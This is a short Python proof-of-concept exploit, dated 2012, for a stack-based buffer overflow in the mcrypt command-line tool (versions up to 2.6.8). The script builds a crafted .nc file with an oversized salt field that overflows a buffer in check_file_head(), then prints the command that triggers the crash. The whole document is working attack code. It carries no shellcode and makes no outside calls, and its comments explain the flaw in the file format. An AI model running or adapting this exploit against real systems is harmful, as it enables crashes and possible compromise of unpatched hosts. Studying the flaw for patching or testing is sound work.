
# Title : mcrypt <= 2.6.8 stack-based buffer overflow poc
# Published : 2012-11-26
# Author :


#!/usr/bin/env python

# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: a stack buffer in check_file_head() overflows when mcrypt decrypts a .nc file whose salt data is too long
#
# shout-outs to all cryptoparty people

import sys

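SALT_LEN = 105  # value of the one-byte salt length field and number of salt bytes appended

# Fixed prefix of the crafted .nc header.  The hex escapes in the original
# listing lost their backslashes during extraction ("x00x6dx03x40..."); decoded,
# the bytes after the first four spell "serpent", "cbc" and "mcrypt-sha1",
# which look like the cipher, mode and key-derivation names mcrypt records in
# a .nc header.  NOTE(review): the meaning of the leading four bytes is not
# established here -- confirm against mcrypt's file-format code.
HEADER_PREFIX = (
    b"\x00\x6d\x03\x40"
    b"serpent\x00 \x00cbc\x00mcrypt-sha1\x00"
)

OUT_PATH = "cyberpunk.nc"


def build_nc_file(salt_len=SALT_LEN):
    """Return the bytes of a .nc file whose salt field is oversized.

    Layout: HEADER_PREFIX, one byte holding *salt_len*, *salt_len* filler
    bytes (0x41), then three NUL bytes.  Per the header comment, the length
    byte is what check_file_head() trusts when it copies the salt into a
    fixed-size stack buffer; a parser that checks this byte against the
    destination buffer size before copying is not affected.

    Args:
        salt_len: value of the length byte and size of the filler; must fit
            in one byte (0..255).

    Returns:
        The file contents as ``bytes`` (``str`` on Python 2).

    Raises:
        ValueError: if *salt_len* is outside 0..255, as ``chr`` did in the
            original Python 2 listing.
    """
    # bytes(bytearray(...)) yields a one-byte string on both Python 2 and 3.
    length_byte = bytes(bytearray((salt_len,)))
    return HEADER_PREFIX + length_byte + b"A" * salt_len + b"\x00" * 3


def main():
    """Write the crafted file to OUT_PATH and print the next step."""
    try:
        # ``with`` closes the handle even if write() raises.
        with open(OUT_PATH, "wb") as out:
            out.write(build_nc_file())
    except IOError:
        print("file error")
        sys.exit(1)
    print("now run  mcrypt -d cyberpunk.nc")


if __name__ == "__main__":
    main()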